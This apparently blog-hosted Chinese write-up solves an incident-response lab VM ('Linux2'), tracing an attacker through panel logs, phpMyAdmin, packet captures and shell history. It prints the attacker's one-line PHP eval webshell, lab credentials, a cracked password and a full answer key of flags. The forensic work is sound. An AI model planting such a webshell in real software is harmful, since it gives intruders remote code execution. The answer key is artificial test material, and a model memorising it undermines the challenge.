Hvv--知攻善防应急响应靶机--Linux2
HW–应急响应靶机–Linux2
所有靶机均来自
知攻善防实验室
靶机整理:
- 夸克网盘:https://pan.quark.cn/s/4b6dffd0c51a#/list/share
- 百度云盘:https://pan.baidu.com/s/1NnrS5asrS1Pw6LUbexewuA?pwd=txmy
官方WP:https://mp.weixin.qq.com/s/opj5dJK7htdawkmLbsSJiQ
蓝队应急响应工具箱:
夸克网盘:https://pan.quark.cn/s/6d7856efd1d1#/list/share
百度云盘:https://pan.baidu.com/s/1ZyrDPH6Ji88w9IJMoFpANA?pwd=ilzn
前景需要:看监控的时候发现webshell告警,领导让你上机检查你可以救救安服仔吗!!1,提交攻击者IP
2,提交攻击者修改的管理员密码(明文)
3,提交第一次Webshell的连接URL(http://xxx.xxx.xxx.xx/abcdefg?abcdefg只需要提交abcdefg?abcdefg)
3,提交Webshell连接密码
4,提交数据包的flag1
5,提交攻击者使用的后续上传的木马文件名称
6,提交攻击者隐藏的flag2
7,提交攻击者隐藏的flag3
解题关键点
网站日志
PHPMyadmin | md5加密
注册页面被挂🐎
WireShark
冰蝎Webshell流量特征
history命令
环境变量
虚拟机登录
密码中的I为大写的ℹ️
查看虚拟机IP,我这里是10.10.10.53,NAT模式自动分配的
由于靶机是最小化模式的,不好操作,也不好复制粘贴,我们利用MobaXterm工具ssh连接靶机进行操作,也可以利用其他ssh连接工具,如Xshell等等
输入密码后发现成功登录靶机
发现当前路径下有一个数据包,还有题解系统
尝试运行题解系统,看需要获取哪些信息
攻击者IP
这个靶机是利用宝塔来管理的,修改宝塔面板密码为root
查看宝塔面板默认信息
登录宝塔面板
输入用户名密码
用户名:uysycv5w
密码:root
成功登录宝塔面板
在网站日志中可看到全部是 192.168.20.1
的IP地址
在 网站
选项卡中点击 127.0.0.1
进 行站点修改,也可看到IP
攻击者修改的管理员密码(明文)
数据库账号密码在那一行,密码点那个眼睛👀就可以显示,可以通过面板或者公共方式访问 phpMyAdmin
,都差不多
这里我们选择面板访问,输入账号密码
用户名:kaoshi
密码:5Sx8mK5ieyLPb84m
成功登录 phpMyAdmin
,发现 kaoshi
数据库
在第二页的 x2_user
表中发现账号密码,密码被加密了,需要查看源码看是什么加密算法来进行逆推
不过这里一眼就可以看出是md5加密,看源码只是为了防止密码被加盐
在 文件
选项卡下,发现了 register.app.php
是注册页面,双击文件即可打开在线编辑器查看文件,发现第65行,存储密码时调用了 modifyUserPassword
函数来加密
#register.app.php文件绝对路径
/www/wwwroot/127.0.0.1/app/user/controller/register.app.php
之后在 user.cls.php
页面中发现 modifyUserPassword
函数代码块,发现利用的是md5加密算法
#user.cls.php文件绝对路径
/www/wwwroot/127.0.0.1/app/user/cls/user.cls.php
直接将peadmin
用户的密码密文放到在线解密网站去解密
在线md5解密网站:
https://www.somd5.com/
密文:
f6f6eb5ace977d7e114377cc7098b7e3
得出明文密码为 Network@2020
第一次Webshell的连接URL
在 网站
选项卡下,双击 127.0.0.1
或者点击最右边的设置
,在 域名管理
中添加一个域名,我添加的是靶机机器IP 10.10.10.53
,之后就可以访问靶机Web页面
访问靶机Web页面,发现是PHPEMS模拟考试系统
拿刚刚获取的账号密码登录网站
账号:
peadmin
密码:
Network@2020
然后点击 个人中心
页面的 后台管理
成功进入网站后台管理页面
在 内容
页面的 标签管理
选择卡中发现木马文件
发现木马写在了 注册协议
的 注册页面
,注册协议的路由为 user-app-register
那提交第一次Webshell的连接URL则为
http://10.10.10.53/index.php?user-app-register
Webshell连接密码
在内容
选项卡页面的标签管理
中发现木马文件
#木马文件源码
<?php
namespace t;
@eval($_POST['Network2020']);
?>
则Webshell的连接密码为 Network2020
数据包的flag1
下载 /root
目录下的 数据包1.pcapng
如果用的是 MobaXterm
软件可以直接拖拽至桌面即可完成下载,其他ssh连接软件自行网上查找下载办法,或者利用其他办法,如SCP、FTP、临时HTTP服务下载等等,这里不多赘述,请自行百度
将数据包用 WireShark
打开,之后输入 tcp.stream eq 20
过滤出一段数据流,选择 /flag1
那一行右键,在弹出的菜单栏中选择 追踪流
— TCP流
,即可弹出页面,在页面中发现 flag1
flag1{Network@_2020_Hack}
攻击者使用的后续上传的木马文件名称
输入 tcp.stream eq 30
过滤出一段数据流,选择 /version2.php
那一行右键,在弹出的菜单栏中选择 追踪流
— TCP流
,即可弹出页面,在页面中发现经典的 冰蝎Webshell特征
冰蝎Webshell流量特征参考文章:冰蝎4.0特征分析及流量检测思路 - FreeBuf网络安全行业门户
#木马名称
version2.php
攻击者隐藏的flag2
查看 history
命令出来的命令历史记录,发现攻击者疑似依次修改过mpnotify.php
与 alinotify.php
两个文件
依据历史命令得知这两个文件是在.api/
目录下的,查看两个文件存放位置
mpnotify.php
文件没有发现异常
在 alinotify.php
文件中发现flag2
flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}
攻击者隐藏的flag3
history命令查看命令记录发现攻击者创建了一个用户flag3
,定义了一个全局变量$flag3
,疑似修改了环境变量文件/etc/profile
,env命令(显示系统的环境变量)也有嫌疑
查看文件、变量、env命令都可查看到flag3
flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}
成功通关
#wp通关Payload192.168.20.1
Network@2020
index.php?user-app-register
Network2020
flag1{Network@_2020_Hack}
version2.php
flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}
flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}
flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}
成功通关
#wp通关Payload192.168.20.1
Network@2020
index.php?user-app-register
Network2020
flag1{Network@_2020_Hack}
version2.php
flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}
flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}
相关文章:
Hvv--知攻善防应急响应靶机--Linux2
HW–应急响应靶机–Linux2 所有靶机均来自 知攻善防实验室 靶机整理: 夸克网盘:https://pan.quark.cn/s/4b6dffd0c51a#/list/share百度云盘:https://pan.baidu.com/s/1NnrS5asrS1Pw6LUbexewuA?pwdtxmy 官方WP:https://mp.weixin.…...
replaceAll is not a function 详解
先说说原因: 在chrome 浏览器中使用 replaceAll 报这个错误,是因为chrome 版本过低, 在chrome 85 以上版本才支持 用法 replaceAll(pattern, replacement)const paragraph "I think Ruths dog is cuter than your dog!"; console…...
如何设置天锐绿盾的数据防泄密系统
设置天锐绿盾的数据防泄密系统,可以按照以下步骤进行: 一、系统安装与初始化 在线或离线安装天锐绿盾数据防泄密系统,确保以管理员身份运行安装包,并按照安装向导的提示完成安装。输入序列号进行注册,激活系统。 二…...
003 gitee怎样将默认的私有仓库变成公开仓库
先点击“管理”, 再点击“基本信息” 在“是否开源”里, 选择:开源...
Spring框架中的IOC(控制反转)详解
Spring框架中的IOC(控制反转)详解 一、引言 在软件开发中,设计模式与框架的应用极大地提高了开发效率和软件质量。其中,Spring框架因其强大的功能和灵活的扩展性,成为了Java企业级应用开发的首选。而Spring框架中的核…...
Score Matching(得分匹配)
Score Matching(得分匹配)是一种统计学习方法,用于估计概率密度函数的梯度(即得分函数),而无需知道密度函数的归一化常数。这种方法由Hyvrinen在2005年提出,主要用于无监督学习,特别…...
五大维度大比拼:ChatGPT比较文心一言,你的AI助手选择指南
文章目录 一、评估AI助手的五个关键维度二、ChatGPT和文心一言的比较 评估AI助手的五个关键维度,以及ChatGPT和文心一言的比较如下: 一、评估AI助手的五个关键维度 界面友好性 : 评估标准:用户界面是否直观易用,是否…...
大学课设项目,Windows端基于UDP的网络聊天程序的服务端和客户端
文章目录 前言项目需求介绍一、服务端1.对Udp套接字进行一个封装2. UdpServer的编写3. Task.h4.protocol.h的编写5.线程池的编写6.main.cc 二、客户端1. Socket.h2.protocol.h3.UdpClient4.menu.h5.main.cpp 三、运行图 前言 本次项目可以作为之前内容的一个扩展,学…...
【5.x】ELK日志分析、集群部署
ELK日志分析 一、ELK概述 1、ELK简介 ELK平台是一套完整的日志集中处理解决方案,将ElasticSearch、Logstash和Kiabana三个开源工具配合使用,完成更强大的用户对日志的查询、排序、统计需求。 一个完整的集中式日志系统,需要包含以下几个主…...
揭秘创业加盟:豫腾助力,发掘商机,共赢未来
在我们生活的这个充满活力与机遇的世界里,商业活动如繁星点点,照亮着每个人的创业梦想。 在这个过程中,创业加盟作为一种独特且吸引人的模式,逐渐受到广大创业者的关注。 本文将深入解析创业加盟的精髓,以及如何在其…...
Linux操作系统以及一些操作命令、安装教程
Web课程完结啦,这是Web第一天的课程大家有兴趣可以传送过去学习 http://t.csdnimg.cn/K547r Linux-Day01 课程内容 Linux简介 Linux安装 Linux常用命令 1. 前言 1.1 什么是Linux Linux是一套免费使用和自由传播的操作系统。说到操作系统,大家比…...
树莓派4B_OpenCv学习笔记6:OpenCv识别已知颜色_运用掩膜
今日继续学习树莓派4B 4G:(Raspberry Pi,简称RPi或RasPi) 本人所用树莓派4B 装载的系统与版本如下: 版本可用命令 (lsb_release -a) 查询: Opencv 版本是4.5.1: 学了这些OpenCv的理论性知识,不进行实践实在…...
ZSH 配置
ZSH 配置 1. 安装 ZSH2. 安装 oh my zsh3. 安装插件3.1 autojump3.2 zsh-autosuggestions 1. 安装 ZSH sudo apt-get install zsh 完成安装后需设置当前用户使用 zsh: chsh -s /bin/zsh 重启后即可使用 2. 安装 oh my zsh 安装 oh my zsh 需先安装 git。 自动安装…...
LogicFlow 学习笔记——5. LogicFlow 基础 主题 Theme
主题 Theme LogicFlow 提供了设置主题的方法,便于用户统一设置其内部所有元素的样式。设置方式有两种: 初始化LogicFlow时作为配置传入初始化后,调用LogicFlow的 setTheme 方法 主题配置参数见主题API 配置 new LogicFlow 时作为将主题配…...
Centos7.9使用kubeadm部署K8S集群
Centos7.9使用kubeadm部署K8S集群 使用kubeadm部署一个k8s集群,单master2worker节点。 1. 环境信息 操作系统:CentOS 7.9.2009内存: 2GBCPU: 2网络: 能够互访,能够访问互联网 hostnameip备注k8s-master192.168.0.51masterk8s-node1192.16…...
VB.net调用VC DLL(二)
参考文献5,讲了在C程序中直接调用DLL和lib的函数方法,不是通过编译器连接方式 也讲了在非C程序中直接调用DLL和lib的函数方法。 实操了一下,建了win32dll项目 新建.h文件和.cpp文件 .h文件中加: void __stdcall funcA(double…...
社团管理系统
用Spring Boot、Vue.js和MyBatis实现社团管理系统 温馨提示:项目源代码获取方式见文末 摘要 本文探讨了如何使用Spring Boot作为后端框架,Vue.js作为前端框架,以及MyBatis作为数据库持久层框架,构建一个社团管理系统。该系统旨…...
网站的文章起到什么作用
1.便于用户了解产品服务 如果想要获得更多的用户访问或者转化率,那么网站就得需要高质量、高原创的文章,通过文章可以让用户更好的了解公司的产品和服务,用户会根据自己的需求去选择服务类型,从而可以给公司产生业务订单&am…...
Science | 稀土开采威胁马来西亚的生物多样性
马来西亚是一个生物多样性热点地区,拥有超过17万种物种,其中1600多种处于濒临灭绝的风险。马来西亚的热带雨林蕴藏了大部分的生物多样性,并为全球提供重要的生态系统效益,同时为土著社区带来经济和文化价值。同时马来西亚具有可观…...
pandas read_csv跳过有错的行
在使用Pandas的read_csv函数时,如果遇到格式错误或其他导致读取失败的行,Pandas默认会抛出异常。但如果你想让Pandas自动跳过这些错误行,可以使用error_bad_linesFalse参数。这将使Pandas在遇到格式错误的行时,忽略这些行而不是中…...
VRChat 2024年裁员原因与背景深度分析
VRChat,作为2022年元宇宙/VR社交领域的巨头,近期在2024年宣布裁员计划,其背后原因和背景值得业界尤其是仍在纯元宇宙虚拟空间创业的同仁们重点关注。 一、创始人决策失误 根据CEO的邮件披露,VRChat的创始人因缺乏经验和过度自信…...
mybatisplus 笔记
int isDelete userRoleMapper.delete(new LambdaQueryWrapper<UserRole>().in(UserRole::getUserId, roleUserDTO.getUserId()).in(UserRole::getRoleId, roleUserDTO.getRoleId()));LambdaQueryWrapper<UserRole>: LambdaQueryWrapper 是 MyBatis Plus 提供的一个…...
Shell脚本(.sh文件)如何执行完毕之后不自动关闭?
Shell脚本异常傲娇,出错后、执行完根本不给你机会让你查看报错信息、输出信息,直接闪退。 废话不多说,调教方法如下,直接在Shell脚本末尾加上如下代码: 1、实现方式一 1.1 使用read命令达到类似bat中的pause命令效果…...
苏州辰安塑业携塑料托盘、塑料物流箱解决方案亮相2024杭州快递物流展
苏州辰安塑业携塑料托盘、吹塑托盘、塑料卡板箱、塑料周转箱、塑料物流箱、塑料垃圾桶解决方案盛装亮相2024杭州快递物流展! 展位号:3C馆A51 苏州辰安塑业有限公司,是一家专业从事塑料托盘、吹塑托盘、塑料卡板箱、塑料周转箱、塑料物流箱、…...
大模型应用开发技术:Multi-Agent框架流程、源码及案例实战(二)
LlaMA 3 系列博客 基于 LlaMA 3 LangGraph 在windows本地部署大模型 (一) 基于 LlaMA 3 LangGraph 在windows本地部署大模型 (二) 基于 LlaMA 3 LangGraph 在windows本地部署大模型 (三) 基于 LlaMA…...
Flutter 实现dispose探测控件
文章目录 前言一、什么是dispose探测控件?1、通常情况2、使用dispose探测控件 二、如何实现1、继承StatefulWidget2、定义dipose回调3、定义child4、重载Dispose方法5、build child 三、完整代码四、使用示例1、基本用法2、设置定义数据 总结 前言 开发flutter一般…...
如何定义和衡量一个产品的成功?
定义和衡量一个产品的成功是一个多维度的过程,涉及用户满意度、市场表现、商业成果和技术实现等多个方面。以下是几个关键点,可以帮助产品经理在面试中全面阐述这一话题: 用户层面的成功: 用户满意度:通过用户调研、N…...
微调大模型 - 面向学术论文的AI大模型
1、优化学术交流: 该项目专注于优化学术文献的阅读、润色和写作过程,提供了实用化的交互接口。 2、模块化和可扩展性: 项目设计模块化,支持自定义快捷按钮和函数插件,便于用户根据自己的需求进行扩展。 3、多语言和多模型支持: 支持多种语言的论文翻译和总结,同时可以并行…...
java溯本求源之基础(二十四)之--常见List的实现共同点
兄弟们终于到了上代码讲代码的环节了,之前的一些代码都是小打小闹,现在才是重头戏,今天来简单说说一些集合,首先这些都是基于数组实现的,当然Collections.emptyList不算奥,别犟。剩下的不多墨迹直接上重点&…...
gin连接redis
使用Gin框架连接Redis,需要先安装Redis客户端库,例如go-redis。然后,你可以创建一个Redis客户端实例,并在Gin路由处理函数中使用它。以下是一个简单的示例: 1. 首先,安装go-redis库: bash go g…...
wordpress显示摘要插件/做一个网站的步骤
每日一练给你一个字符串 s 、一个字符串 t 。返回 s 中涵盖 t 所有字符的最小子串。如果 s 中不存在涵盖 t 所有字符的子串,则返回空字符串 ""给你一个字符串 s 、一个字符串 t 。返回 s 中涵盖 t 所有字符的最小子串。如果 s 中不存在涵盖 t 所有字符的子…...
十年网站建设/重庆黄埔seo整站优化
题目相关 题目链接 洛谷,https://www.luogu.com.cn/problem/P1114。 计蒜客,https://nanti.jisuanke.com/t/T1853。 我的OJ,http://47.110.135.197/problem.php?id5252。 题目描述 近来,初一年的XXX小朋友致力于研究班上同…...
做的好看的旅游网站/如何推广app更高效
PS菜单:滤镜/其它/HSB/HSLFilter/Others/HSB/HSL◆ ◆ ◆工作原理要弄清楚 HSB/HSL 滤镜的工作原理,首先需要搞清楚三种色彩模式:RGB、HSB 和 HSL。RGB色彩模式RGB 色彩模式不多赘述,它已经是当今大多数显示设备的标准色彩模式。…...
成都手机网站建/免费下载百度
Matlab 中经常需要对矩阵进行维度上的操作,下面做一个简单的总结: 在Matlab中,不管矩阵的维度是多少,数据在内存中的存储都是按照 “行-列-页” 的顺序进行存储的。比如: >> a [11,12,13; 21,22,23]a <spa…...
童装网站建设/网红推广
1. 优化你的MySQL查询缓存在MySQL服务器上进行查询,可以启用高速查询缓存。让数据库引擎在后台悄悄的处理是提高性能的最有效方法之一。当同一个查询被执行多次时,如果结果是从缓存中提取,那是相当快的。但主要的问题是,它是那么容…...
网站app封装怎么做/武汉seo价格
//修改版,加入错误信息反馈<?phpheader(Content-type:text/html;charsetutf-8);$cnn new mysqli(localhost, root, root, test); //加了die()居然没有代码提示,蛋疼if($cnn->connect_errno) {die(连接数据库失败: . $cnn->connect_error)…...